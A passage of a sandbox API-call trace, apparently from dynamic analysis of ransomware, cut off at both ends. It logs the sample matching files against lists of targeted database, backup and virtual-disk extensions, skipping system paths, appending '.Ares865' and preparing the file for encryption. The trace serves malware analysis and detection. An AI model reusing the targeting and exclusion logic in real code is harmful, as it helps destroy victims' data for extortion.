(lpString=".dll") returned 4 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0091.680] lstrlenW (lpString=".lnk") returned 4 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0091.680] lstrlenW (lpString=".ini") returned 4 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0091.680] lstrlenW (lpString=".sys") returned 4 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0091.680] lstrlenW (lpString="desktop.ini") returned 11 [0091.680] lstrlenW (lpString="bak") returned 3 [0091.680] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0091.680] lstrlenW (lpString="ba_") returned 3 [0091.680] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0091.680] lstrlenW (lpString="dbb") returned 3 [0091.680] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0091.680] lstrlenW (lpString="vmdk") returned 4 [0091.680] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0091.680] lstrlenW (lpString="rar") returned 3 [0091.680] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0091.681] lstrlenW (lpString="zip") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0091.681] lstrlenW (lpString="tgz") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0091.681] lstrlenW (lpString="vbox") returned 4 [0091.681] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0091.681] lstrlenW (lpString="vdi") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0091.681] lstrlenW (lpString="vhd") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0091.681] lstrlenW (lpString="vhdx") returned 4 [0091.681] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0091.681] lstrlenW (lpString="avhd") returned 4 [0091.681] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0091.681] lstrlenW (lpString="db") returned 2 [0091.681] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0091.681] lstrlenW (lpString="db2") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0091.681] lstrlenW (lpString="db3") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0091.681] lstrlenW (lpString="dbf") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0091.681] lstrlenW (lpString="mdf") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0091.681] lstrlenW (lpString="mdb") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0091.681] lstrlenW (lpString="sql") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0091.681] lstrlenW (lpString="sqlite") returned 6 [0091.681] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0091.681] lstrlenW (lpString="sqlite3") returned 7 [0091.681] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0091.681] lstrlenW (lpString="sqlitedb") returned 8 [0091.681] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0091.681] lstrlenW (lpString="xml") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0091.681] lstrlenW (lpString="$er") returned 3 [0091.681] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0091.682] lstrlenW (lpString="4dd") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0091.682] lstrlenW (lpString="4dl") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0091.682] lstrlenW (lpString="^^^") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0091.682] lstrlenW (lpString="abs") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0091.682] lstrlenW (lpString="abx") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0091.682] lstrlenW (lpString="accdb") returned 5 [0091.682] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0091.682] lstrlenW (lpString="accdc") returned 5 [0091.682] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0091.682] lstrlenW (lpString="accde") returned 5 [0091.682] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0091.682] lstrlenW (lpString="accdr") returned 5 [0091.682] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0091.682] lstrlenW (lpString="accdt") returned 5 [0091.682] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0091.682] lstrlenW (lpString="accdw") returned 5 [0091.682] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0091.682] lstrlenW (lpString="accft") returned 5 [0091.682] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0091.682] lstrlenW (lpString="adb") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0091.682] lstrlenW (lpString="adb") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0091.682] lstrlenW (lpString="ade") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0091.682] lstrlenW (lpString="adf") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0091.682] lstrlenW (lpString="adn") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0091.682] lstrlenW (lpString="adp") returned 3 [0091.682] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0091.682] lstrlenW (lpString="alf") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0091.683] lstrlenW (lpString="ask") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0091.683] lstrlenW (lpString="btr") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0091.683] lstrlenW (lpString="cat") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0091.683] lstrlenW (lpString="cdb") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0091.683] lstrlenW (lpString="ckp") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0091.683] lstrlenW (lpString="cma") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0091.683] lstrlenW (lpString="cpd") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0091.683] lstrlenW (lpString="dacpac") returned 6 [0091.683] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0091.683] lstrlenW (lpString="dad") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0091.683] lstrlenW (lpString="dadiagrams") returned 10 [0091.683] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0091.683] lstrlenW (lpString="daschema") returned 8 [0091.683] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0091.683] lstrlenW (lpString="db-journal") returned 10 [0091.683] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0091.683] lstrlenW (lpString="db-shm") returned 6 [0091.683] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0091.683] lstrlenW (lpString="db-wal") returned 6 [0091.683] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0091.683] lstrlenW (lpString="dbc") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0091.683] lstrlenW (lpString="dbs") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0091.683] lstrlenW (lpString="dbt") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0091.683] lstrlenW (lpString="dbv") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0091.683] lstrlenW (lpString="dbx") returned 3 [0091.683] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0091.684] lstrlenW (lpString="dcb") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0091.684] lstrlenW (lpString="dct") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0091.684] lstrlenW (lpString="dcx") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0091.684] lstrlenW (lpString="ddl") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0091.684] lstrlenW (lpString="dlis") returned 4 [0091.684] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0091.684] lstrlenW (lpString="dp1") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0091.684] lstrlenW (lpString="dqy") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0091.684] lstrlenW (lpString="dsk") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0091.684] lstrlenW (lpString="dsn") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0091.684] lstrlenW (lpString="dtsx") returned 4 [0091.684] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0091.684] lstrlenW (lpString="dxl") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0091.684] lstrlenW (lpString="eco") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0091.684] lstrlenW (lpString="ecx") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0091.684] lstrlenW (lpString="edb") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0091.684] lstrlenW (lpString="epim") returned 4 [0091.684] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0091.684] lstrlenW (lpString="fcd") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0091.684] lstrlenW (lpString="fdb") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0091.684] lstrlenW (lpString="fic") returned 3 [0091.684] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0091.684] lstrlenW (lpString="flexolibrary") returned 12 [0091.684] lstrlenW (lpString="fm5") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0091.685] lstrlenW (lpString="fmp") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0091.685] lstrlenW (lpString="fmp12") returned 5 [0091.685] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0091.685] lstrlenW (lpString="fmpsl") returned 5 [0091.685] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0091.685] lstrlenW (lpString="fol") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0091.685] lstrlenW (lpString="fp3") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0091.685] lstrlenW (lpString="fp4") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0091.685] lstrlenW (lpString="fp5") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0091.685] lstrlenW (lpString="fp7") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0091.685] lstrlenW (lpString="fpt") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0091.685] lstrlenW (lpString="frm") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0091.685] lstrlenW (lpString="gdb") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0091.685] lstrlenW (lpString="gdb") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0091.685] lstrlenW (lpString="grdb") returned 4 [0091.685] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0091.685] lstrlenW (lpString="gwi") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0091.685] lstrlenW (lpString="hdb") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0091.685] lstrlenW (lpString="his") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0091.685] lstrlenW (lpString="ib") returned 2 [0091.685] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0091.685] lstrlenW (lpString="idb") returned 3 [0091.685] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0091.685] lstrlenW (lpString="ihx") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0091.686] lstrlenW (lpString="itdb") returned 4 [0091.686] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0091.686] lstrlenW (lpString="itw") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0091.686] lstrlenW (lpString="jet") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0091.686] lstrlenW (lpString="jtx") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0091.686] lstrlenW (lpString="kdb") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0091.686] lstrlenW (lpString="kexi") returned 4 [0091.686] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0091.686] lstrlenW (lpString="kexic") returned 5 [0091.686] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0091.686] lstrlenW (lpString="kexis") returned 5 [0091.686] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0091.686] lstrlenW (lpString="lgc") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0091.686] lstrlenW (lpString="lwx") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0091.686] lstrlenW (lpString="maf") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0091.686] lstrlenW (lpString="maq") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0091.686] lstrlenW (lpString="mar") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0091.686] lstrlenW (lpString="marshal") returned 7 [0091.686] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0091.686] lstrlenW (lpString="mas") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0091.686] lstrlenW (lpString="mav") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0091.686] lstrlenW (lpString="maw") returned 3 [0091.686] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0091.686] lstrlenW (lpString="mdbhtml") returned 7 [0091.686] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0091.686] lstrlenW (lpString="mdn") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0091.687] lstrlenW (lpString="mdt") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0091.687] lstrlenW (lpString="mfd") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0091.687] lstrlenW (lpString="mpd") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0091.687] lstrlenW (lpString="mrg") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0091.687] lstrlenW (lpString="mud") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0091.687] lstrlenW (lpString="mwb") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0091.687] lstrlenW (lpString="myd") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0091.687] lstrlenW (lpString="ndf") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0091.687] lstrlenW (lpString="nnt") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0091.687] lstrlenW (lpString="nrmlib") returned 6 [0091.687] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0091.687] lstrlenW (lpString="ns2") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0091.687] lstrlenW (lpString="ns3") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0091.687] lstrlenW (lpString="ns4") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0091.687] lstrlenW (lpString="nsf") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0091.687] lstrlenW (lpString="nv") returned 2 [0091.687] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0091.687] lstrlenW (lpString="nv2") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0091.687] lstrlenW (lpString="nwdb") returned 4 [0091.687] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0091.687] lstrlenW (lpString="nyf") returned 3 [0091.687] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0091.688] lstrlenW (lpString="odb") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0091.688] lstrlenW (lpString="odb") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0091.688] lstrlenW (lpString="oqy") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0091.688] lstrlenW (lpString="ora") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0091.688] lstrlenW (lpString="orx") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0091.688] lstrlenW (lpString="owc") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0091.688] lstrlenW (lpString="p96") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0091.688] lstrlenW (lpString="p97") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0091.688] lstrlenW (lpString="pan") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0091.688] lstrlenW (lpString="pdb") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0091.688] lstrlenW (lpString="pdm") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0091.688] lstrlenW (lpString="pnz") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0091.688] lstrlenW (lpString="qry") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0091.688] lstrlenW (lpString="qvd") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0091.688] lstrlenW (lpString="rbf") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0091.688] lstrlenW (lpString="rctd") returned 4 [0091.688] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0091.688] lstrlenW (lpString="rod") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0091.688] lstrlenW (lpString="rodx") returned 4 [0091.688] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0091.688] lstrlenW (lpString="rpd") returned 3 [0091.688] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0091.689] lstrlenW (lpString="rsd") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0091.689] lstrlenW (lpString="sas7bdat") returned 8 [0091.689] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0091.689] lstrlenW (lpString="sbf") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0091.689] lstrlenW (lpString="scx") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0091.689] lstrlenW (lpString="sdb") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0091.689] lstrlenW (lpString="sdc") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0091.689] lstrlenW (lpString="sdf") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0091.689] lstrlenW (lpString="sis") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0091.689] lstrlenW (lpString="spq") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0091.689] lstrlenW (lpString="te") returned 2 [0091.689] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0091.689] lstrlenW (lpString="teacher") returned 7 [0091.689] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0091.689] lstrlenW (lpString="tmd") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0091.689] lstrlenW (lpString="tps") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0091.689] lstrlenW (lpString="trc") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0091.689] lstrlenW (lpString="trc") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0091.689] lstrlenW (lpString="trm") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0091.689] lstrlenW (lpString="udb") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0091.689] lstrlenW (lpString="udl") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0091.689] lstrlenW (lpString="usr") returned 3 [0091.689] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0091.689] lstrlenW (lpString="v12") returned 3 [0091.690] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0091.690] lstrlenW (lpString="vis") returned 3 [0091.690] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0091.690] lstrlenW (lpString="vpd") returned 3 [0091.690] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0091.690] lstrlenW (lpString="vvv") returned 3 [0091.690] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0091.690] lstrlenW (lpString="wdb") returned 3 [0091.690] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0091.690] lstrlenW (lpString="wmdb") returned 4 [0091.690] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0091.690] lstrlenW (lpString="wrk") returned 3 [0091.690] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0091.690] lstrlenW (lpString="xdb") returned 3 [0091.690] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0091.690] lstrlenW (lpString="xld") returned 3 [0091.690] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0091.690] lstrlenW (lpString="xmlff") returned 5 [0091.690] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0091.690] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.Ares865") returned 56 [0091.690] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0091.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.691] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=504) returned 1 [0091.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.691] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.692] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500, lpName=0x0) returned 0x15c [0091.693] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x500) returned 0x190000 [0091.693] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.694] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.694] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.694] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.695] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.695] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9c523d0, ftCreationTime.dwHighDateTime=0x1d4d248, ftLastAccessTime.dwLowDateTime=0xef1d780, ftLastAccessTime.dwHighDateTime=0x1d4d574, ftLastWriteTime.dwLowDateTime=0xef1d780, ftLastWriteTime.dwHighDateTime=0x1d4d574, nFileSizeHigh=0x0, nFileSizeLow=0xd95, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imuT3vD5fx4.mkv", cAlternateFileName="IMUT3V~1.MKV")) returned 1 [0091.695] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="aoldtz.exe") returned 1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2=".") returned 1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="..") returned 1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="windows") returned -1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="bootmgr") returned 1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="temp") returned -1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="pagefile.sys") returned -1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="boot") returned 1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="ids.txt") returned 1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="ntuser.dat") returned -1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="perflogs") returned -1 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2="MSBuild") returned -1 [0091.696] lstrlenW (lpString="imuT3vD5fx4.mkv") returned 15 [0091.696] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 48 [0091.696] lstrcpyW (in: lpString1=0x2cce44a, lpString2="imuT3vD5fx4.mkv" | out: lpString1="imuT3vD5fx4.mkv") returned="imuT3vD5fx4.mkv" [0091.696] lstrlenW (lpString="imuT3vD5fx4.mkv") returned 15 [0091.696] lstrlenW (lpString="Ares865") returned 7 [0091.696] lstrcmpiW (lpString1="fx4.mkv", lpString2="Ares865") returned 1 [0091.696] lstrlenW (lpString=".dll") returned 4 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2=".dll") returned 1 [0091.696] lstrlenW (lpString=".lnk") returned 4 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2=".lnk") returned 1 [0091.696] lstrlenW (lpString=".ini") returned 4 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", 